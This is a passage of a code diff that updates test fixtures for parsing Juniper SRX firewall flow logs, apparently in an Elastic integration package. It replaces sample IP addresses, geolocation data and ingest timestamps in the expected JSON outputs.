application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] +<14>1 2020-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE_LS [junos@67.43.156.15 reason="TCP CLIENT RST" source-address="67.43.156.14" source-port="48873" destination-address="67.43.156.15" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="67.43.156.14" nat-source-port="48873" nat-destination-address="67.43.156.15" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] +<14>1 2020-07-14T14:17:11.928Z SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address="10.1.1.100" source-port="58943" destination-address="67.43.156.14" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="172.19.34.100" nat-source-port="6018" nat-destination-address="67.43.156.14" nat-destination-port="80" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="16118" packets-from-client="42" bytes-from-client="2322" packets-from-server="34" bytes-from-server="2132" elapsed-time="60" username="N/A" roles="N/A" encrypted="No" destination-interface-name="ge-0/0/0.0" category="N/A" sub-category="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] +<14>1 2020-07-13T16:43:05.041Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="idle Timeout" source-address="10.1.1.100" source-port="64720" destination-address="67.43.156.15" destination-port="8883" connection-tag="0" service-name="None" nat-source-address="172.19.34.100" nat-source-port="24519" nat-destination-address="67.43.156.15" nat-destination-port="8883" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="3851" packets-from-client="161" bytes-from-client="9530" packets-from-server="96" bytes-from-server="9670" elapsed-time="23755" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" secure-web-proxy-session-type="NA" peer-session-id="0" peer-source-address="0.0.0.0" peer-source-port="0" peer-destination-address="0.0.0.0" peer-destination-port="0" hostname="NA NA" src-vrf-grp="N/A" dst-vrf-grp="N/A"] +<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address="10.1.1.100" source-port="49583" destination-address="67.43.156.15" destination-port="53" connection-tag="0" service-name="junos-dns-udp" nat-source-address="172.19.34.100" nat-source-port="30838" nat-destination-address="67.43.156.15" nat-destination-port="53" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15399" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] +<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason="Closed by junos-alg" source-address="10.1.1.100" source-port="63381" destination-address="67.43.156.15" destination-port="53" service-name="junos-dns-udp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="172.19.34.100" nat-source-port="26764" nat-destination-address="67.43.156.15" nat-destination-port="53" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15361" packets-from-client="1" bytes-from-client="66" packets-from-server="1" bytes-from-server="82" elapsed-time="3" username="N/A" roles="N/A" encrypted="No" profile-name="N/A" rule-name="N/A" routing-instance="default" destination-interface-name="ge-0/0/0.0" uplink-incoming-interface-name="N/A" uplink-tx-bytes="0" uplink-rx-bytes="0" category="N/A" sub-category="N/A" apbr-policy-name="N/A" multipath-rule-name="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log-expected.json index fe582363d5e..0372dd350ea 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log-expected.json +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-flow.log-expected.json @@ -80,8 +80,8 @@ }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:20.065983785Z", - "original": "\u003c14\u003e1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.134 source-address=\"10.0.0.1\" source-port=\"594\" destination-address=\"10.128.0.1\" destination-port=\"10400\" connection-tag=\"0\" service-name=\"icmp\" nat-source-address=\"10.0.0.1\" nat-source-port=\"594\" nat-destination-address=\"10.128.0.1\" nat-destination-port=\"10400\" nat-connection-tag=\"0\" src-nat-rule-type=\"N/A\" src-nat-rule-name=\"N/A\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"1\" policy-name=\"vpn_trust_permit-all\" source-zone-name=\"vpn\" destination-zone-name=\"trust\" session-id-32=\"6093\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"st0.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", + "ingested": "2021-12-10T10:13:51.706916400Z", + "original": "\u003c14\u003e1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"10.0.0.1\" source-port=\"594\" destination-address=\"10.128.0.1\" destination-port=\"10400\" connection-tag=\"0\" service-name=\"icmp\" nat-source-address=\"10.0.0.1\" nat-source-port=\"594\" nat-destination-address=\"10.128.0.1\" nat-destination-port=\"10400\" nat-connection-tag=\"0\" src-nat-rule-type=\"N/A\" src-nat-rule-name=\"N/A\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"1\" policy-name=\"vpn_trust_permit-all\" source-zone-name=\"vpn\" destination-zone-name=\"trust\" session-id-32=\"6093\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"st0.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", "risk_score": 1.0, "kind": "event", "action": "flow_started", @@ -163,8 +163,8 @@ }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:20.065997020Z", - "original": "\u003c14\u003e1 2019-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.1.1.1.2.134 source-address=\"10.0.0.26\" source-port=\"37233\" destination-address=\"10.128.0.1\" destination-port=\"161\" connection-tag=\"0\" service-name=\"None\" protocol-id=\"17\" icmp-type=\"0\" policy-name=\"MgmtAccess-trust-cleanup\" source-zone-name=\"trust\" destination-zone-name=\"junos-host\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\".local..0\" encrypted=\"No\" reason=\"Denied by policy\" session-id-32=\"7087\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", + "ingested": "2021-12-10T10:13:51.706995100Z", + "original": "\u003c14\u003e1 2019-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY [junos@67.43.156.15 source-address=\"10.0.0.26\" source-port=\"37233\" destination-address=\"10.128.0.1\" destination-port=\"161\" connection-tag=\"0\" service-name=\"None\" protocol-id=\"17\" icmp-type=\"0\" policy-name=\"MgmtAccess-trust-cleanup\" source-zone-name=\"trust\" destination-zone-name=\"junos-host\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\".local..0\" encrypted=\"No\" reason=\"Denied by policy\" session-id-32=\"7087\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", "risk_score": 1.0, "kind": "event", "action": "flow_deny", @@ -181,57 +181,45 @@ { "server": { "port": 2003, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 2003, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "rule": { "name": "log-all-else" }, "source": { "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 56639, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "juniper": { "srx": { @@ -268,17 +256,17 @@ }, "related": { "ip": [ - "89.160.20.112" + "67.43.156.15" ] }, "client": { "port": 56639, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:20.066000026Z", - "original": "\u003c14\u003e1 2014-05-01T08:26:51.179Z fw01 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.1.1.1.2.39 source-address=\"89.160.20.112\" source-port=\"56639\" destination-address=\"89.160.20.112\" destination-port=\"2003\" service-name=\"None\" protocol-id=\"6\" icmp-type=\"0\" policy-name=\"log-all-else\" source-zone-name=\"campus\" destination-zone-name=\"mngmt\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth6.0\" encrypted=\"No \"]", + "ingested": "2021-12-10T10:13:51.706999500Z", + "original": "\u003c14\u003e1 2014-05-01T08:26:51.179Z fw01 RT_FLOW - RT_FLOW_SESSION_DENY [junos@67.43.156.15 source-address=\"67.43.156.15\" source-port=\"56639\" destination-address=\"67.43.156.15\" destination-port=\"2003\" service-name=\"None\" protocol-id=\"6\" icmp-type=\"0\" policy-name=\"log-all-else\" source-zone-name=\"campus\" destination-zone-name=\"mngmt\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth6.0\" encrypted=\"No \"]", "kind": "event", "action": "flow_deny", "category": [ @@ -299,7 +287,7 @@ "port": 902, "bytes": 0, "packets": 0, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -307,29 +295,23 @@ "destination": { "nat": { "port": 902, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 902, "bytes": 0, - "ip": "89.160.20.112", + "ip": "67.43.156.15", "packets": 0 }, "rule": { @@ -338,29 +320,23 @@ "source": { "nat": { "port": 63456, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 63456, "bytes": 94, - "ip": "89.160.20.112", + "ip": "67.43.156.15", "packets": 1 }, "juniper": { @@ -401,7 +377,7 @@ }, "related": { "ip": [ - "89.160.20.112" + "67.43.156.15" ] }, "client": { @@ -411,13 +387,13 @@ "port": 63456, "bytes": 94, "packets": 1, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "event": { "duration": 60000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066019422Z", - "original": "\u003c14\u003e1 2014-05-01T08:28:10.933Z fw01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.39 reason=\"unset\" source-address=\"89.160.20.112\" source-port=\"63456\" destination-address=\"89.160.20.112\" destination-port=\"902\" service-name=\"None\" nat-source-address=\"89.160.20.112\" nat-source-port=\"63456\" nat-destination-address=\"89.160.20.112\" nat-destination-port=\"902\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"17\" policy-name=\"mngmt-to-vcenter\" source-zone-name=\"mngmt\" destination-zone-name=\"intra\" session-id-32=\"15353\" packets-from-client=\"1\" bytes-from-client=\"94\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"60\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth3.5\" encrypted=\"No \"]", + "ingested": "2021-12-10T10:13:51.707006900Z", + "original": "\u003c14\u003e1 2014-05-01T08:28:10.933Z fw01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"unset\" source-address=\"67.43.156.15\" source-port=\"63456\" destination-address=\"67.43.156.15\" destination-port=\"902\" service-name=\"None\" nat-source-address=\"67.43.156.15\" nat-source-port=\"63456\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"902\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"17\" policy-name=\"mngmt-to-vcenter\" source-zone-name=\"mngmt\" destination-zone-name=\"intra\" session-id-32=\"15353\" packets-from-client=\"1\" bytes-from-client=\"94\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"60\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth3.5\" encrypted=\"No \"]", "kind": "event", "start": "2014-05-01T08:28:10.933Z", "action": "flow_close", @@ -439,7 +415,7 @@ "port": 768 }, "port": 768, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -447,22 +423,22 @@ "destination": { "nat": { "port": 768, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 768, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "rule": { "name": "alg-policy" @@ -470,28 +446,22 @@ "source": { "nat": { "port": 24065, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 24065, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "juniper": { "srx": { @@ -528,8 +498,7 @@ }, "related": { "ip": [ - "89.160.20.112", - "81.2.69.193" + "67.43.156.14" ] }, "client": { @@ -537,12 +506,12 @@ "port": 24065 }, "port": 24065, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:20.066022898Z", - "original": "\u003c14\u003e1 2013-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.35 source-address=\"89.160.20.112\" source-port=\"24065\" destination-address=\"81.2.69.193\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"89.160.20.112\" nat-source-port=\"24065\" nat-destination-address=\"81.2.69.193\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"]", + "ingested": "2021-12-10T10:13:51.707014500Z", + "original": "\u003c14\u003e1 2013-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"24065\" destination-address=\"67.43.156.14\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"67.43.156.14\" nat-source-port=\"24065\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"]", "kind": "event", "action": "flow_started", "category": [ @@ -562,7 +531,7 @@ "port": 46384 }, "port": 46384, - "ip": "89.160.20.112" + "ip": "192.168.100.12" }, "log": { "level": "informational" @@ -570,28 +539,22 @@ "destination": { "nat": { "port": 46384, - "ip": "18.51.100.12" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 46384, - "ip": "89.160.20.112" + "ip": "192.168.100.12" }, "rule": { "name": "policy1" @@ -599,10 +562,10 @@ "source": { "nat": { "port": 1, - "ip": "192.0.2.1" + "ip": "192.168.2.1" }, "port": 1, - "ip": "192.0.2.1" + "ip": "192.168.2.1" }, "juniper": { "srx": { @@ -639,9 +602,9 @@ }, "related": { "ip": [ - "192.0.2.1", - "89.160.20.112", - "18.51.100.12" + "192.168.2.1", + "192.168.100.12", + "67.43.156.14" ] }, "client": { @@ -649,12 +612,12 @@ "port": 1 }, "port": 1, - "ip": "192.0.2.1" + "ip": "192.168.2.1" }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:20.066025283Z", - "original": "\u003c14\u003e1 2010-09-30T14:55:04.323+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2626.192.0.2.1.40 source-address=\"192.0.2.1\" source-port=\"1\" destination-address=\"89.160.20.112\" destination-port=\"46384\" service-name=\"icmp\" nat-source-address=\"192.0.2.1\" nat-source-port=\"1\" nat-destination-address=\"18.51.100.12\" nat-destination-port=\"46384\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"policy1\" source-zone-name=\"trustZone\" destination-zone-name=\"untrustZone\" session-id-32=\"41\" packet-incoming-interface=\"ge-0/0/1.0\"]", + "ingested": "2021-12-10T10:13:51.707020500Z", + "original": "\u003c14\u003e1 2010-09-30T14:55:04.323+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"192.168.2.1\" source-port=\"1\" destination-address=\"192.168.100.12\" destination-port=\"46384\" service-name=\"icmp\" nat-source-address=\"192.168.2.1\" nat-source-port=\"1\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"46384\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"policy1\" source-zone-name=\"trustZone\" destination-zone-name=\"untrustZone\" session-id-32=\"41\" packet-incoming-interface=\"ge-0/0/1.0\"]", "kind": "event", "action": "flow_started", "category": [ @@ -676,7 +639,7 @@ "port": 46384, "bytes": 84, "packets": 1, - "ip": "89.160.20.112" + "ip": "192.168.100.12" }, "log": { "level": "informational" @@ -684,29 +647,23 @@ "destination": { "nat": { "port": 46384, - "ip": "18.51.100.12" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 46384, "bytes": 84, - "ip": "89.160.20.112", + "ip": "192.168.100.12", "packets": 1 }, "rule": { @@ -715,12 +672,12 @@ "source": { "nat": { "port": 1, - "ip": "192.0.2.1" + "ip": "192.168.2.1" }, "port": 1, "bytes": 84, "packets": 1, - "ip": "192.0.2.1" + "ip": "192.168.2.1" }, "juniper": { "srx": { @@ -760,9 +717,9 @@ }, "related": { "ip": [ - "192.0.2.1", - "89.160.20.112", - "18.51.100.12" + "192.168.2.1", + "192.168.100.12", + "67.43.156.14" ] }, "client": { @@ -772,13 +729,13 @@ "port": 1, "bytes": 84, "packets": 1, - "ip": "192.0.2.1" + "ip": "192.168.2.1" }, "event": { "duration": 0, "severity": 14, - "ingested": "2021-12-06T12:25:20.066061331Z", - "original": "\u003c14\u003e1 2010-09-30T14:55:07.188+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2626.192.0.2.1.40 reason=\"response received\" source-address=\"192.0.2.1\" source-port=\"1\" destination-address=\"89.160.20.112\" destination-port=\"46384\" service-name=\"icmp\" nat-source-address=\"192.0.2.1\" nat-source-port=\"1\" nat-destination-address=\"18.51.100.12\" nat-destination-port=\"46384\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"policy1\" source-zone-name=\"trustZone\" destination-zone-name=\"untrustZone\" session-id-32=\"41\" packets-from-client=\"1\" bytes-from-client=\"84\" packets-from-server=\"1\" bytes-from-server=\"84\" elapsed-time=\"0\" packet-incoming-interface=\"ge-0/0/1.0\"]", + "ingested": "2021-12-10T10:13:51.707025300Z", + "original": "\u003c14\u003e1 2010-09-30T14:55:07.188+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"response received\" source-address=\"192.168.2.1\" source-port=\"1\" destination-address=\"192.168.100.12\" destination-port=\"46384\" service-name=\"icmp\" nat-source-address=\"192.168.2.1\" nat-source-port=\"1\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"46384\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"policy1\" source-zone-name=\"trustZone\" destination-zone-name=\"untrustZone\" session-id-32=\"41\" packets-from-client=\"1\" bytes-from-client=\"84\" packets-from-server=\"1\" bytes-from-server=\"84\" elapsed-time=\"0\" packet-incoming-interface=\"ge-0/0/1.0\"]", "kind": "event", "start": "2010-09-30T06:55:07.188Z", "action": "flow_close", @@ -802,7 +759,7 @@ "port": 80, "bytes": 535, "packets": 4, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -810,29 +767,23 @@ "destination": { "nat": { "port": 80, - "ip": "89.160.20.112" + "ip": "67.43.156.15" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 80, "bytes": 535, - "ip": "89.160.20.112", + "ip": "67.43.156.15", "packets": 4 }, "rule": { @@ -895,7 +846,7 @@ "related": { "ip": [ "10.3.255.203", - "89.160.20.112", + "67.43.156.15", "10.3.136.49" ] }, @@ -911,8 +862,8 @@ "event": { "duration": 1000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066065298Z", - "original": "\u003c14\u003e1 2019-04-12T14:29:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason=\"TCP FIN\" source-address=\"10.3.255.203\" source-port=\"47776\" destination-address=\"89.160.20.112\" destination-port=\"80\" connection-tag=\"0\" service-name=\"junos-http\" nat-source-address=\"10.3.136.49\" nat-source-port=\"19162\" nat-destination-address=\"89.160.20.112\" nat-destination-port=\"80\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"nat1\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit_all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"5\" packets-from-client=\"6\" bytes-from-client=\"337\" packets-from-server=\"4\" bytes-from-server=\"535\" elapsed-time=\"1\" application=\"HTTP\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/0.0\" encrypted=\"No\" application-category=\"Web\" application-sub-category=\"N/A\" application-risk=\"4\" application-characteristics=\"Can Leak Information;Supports File Transfer;Prone to Misuse;Known Vulnerabilities;Carrier of Malware;Capable of Tunneling;\"]", + "ingested": "2021-12-10T10:13:51.707031700Z", + "original": "\u003c14\u003e1 2019-04-12T14:29:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"TCP FIN\" source-address=\"10.3.255.203\" source-port=\"47776\" destination-address=\"67.43.156.15\" destination-port=\"80\" connection-tag=\"0\" service-name=\"junos-http\" nat-source-address=\"10.3.136.49\" nat-source-port=\"19162\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"nat1\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit_all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"5\" packets-from-client=\"6\" bytes-from-client=\"337\" packets-from-server=\"4\" bytes-from-server=\"535\" elapsed-time=\"1\" application=\"HTTP\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/0.0\" encrypted=\"No\" application-category=\"Web\" application-sub-category=\"N/A\" application-risk=\"4\" application-characteristics=\"Can Leak Information;Supports File Transfer;Prone to Misuse;Known Vulnerabilities;Carrier of Malware;Capable of Tunneling;\"]", "risk_score": 4.0, "kind": "event", "start": "2019-04-12T14:29:06.576Z", @@ -1019,8 +970,8 @@ "event": { "duration": 16000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066067813Z", - "original": "\u003c14\u003e1 2019-04-13T14:33:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.58 reason=\"TCP RST\" source-address=\"192.168.2.164\" source-port=\"53232\" destination-address=\"172.16.1.19\" destination-port=\"445\" service-name=\"junos-smb\" nat-source-address=\"192.168.2.164\" nat-source-port=\"53232\" nat-destination-address=\"172.16.1.19\" nat-destination-port=\"445\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"35\" source-zone-name=\"Trust\" destination-zone-name=\"Trust\" session-id-32=\"206\" packets-from-client=\"13\" bytes-from-client=\"4274\" packets-from-server=\"9\" bytes-from-server=\"1575\" elapsed-time=\"16\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/2.0\"]", + "ingested": "2021-12-10T10:13:51.707037500Z", + "original": "\u003c14\u003e1 2019-04-13T14:33:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE 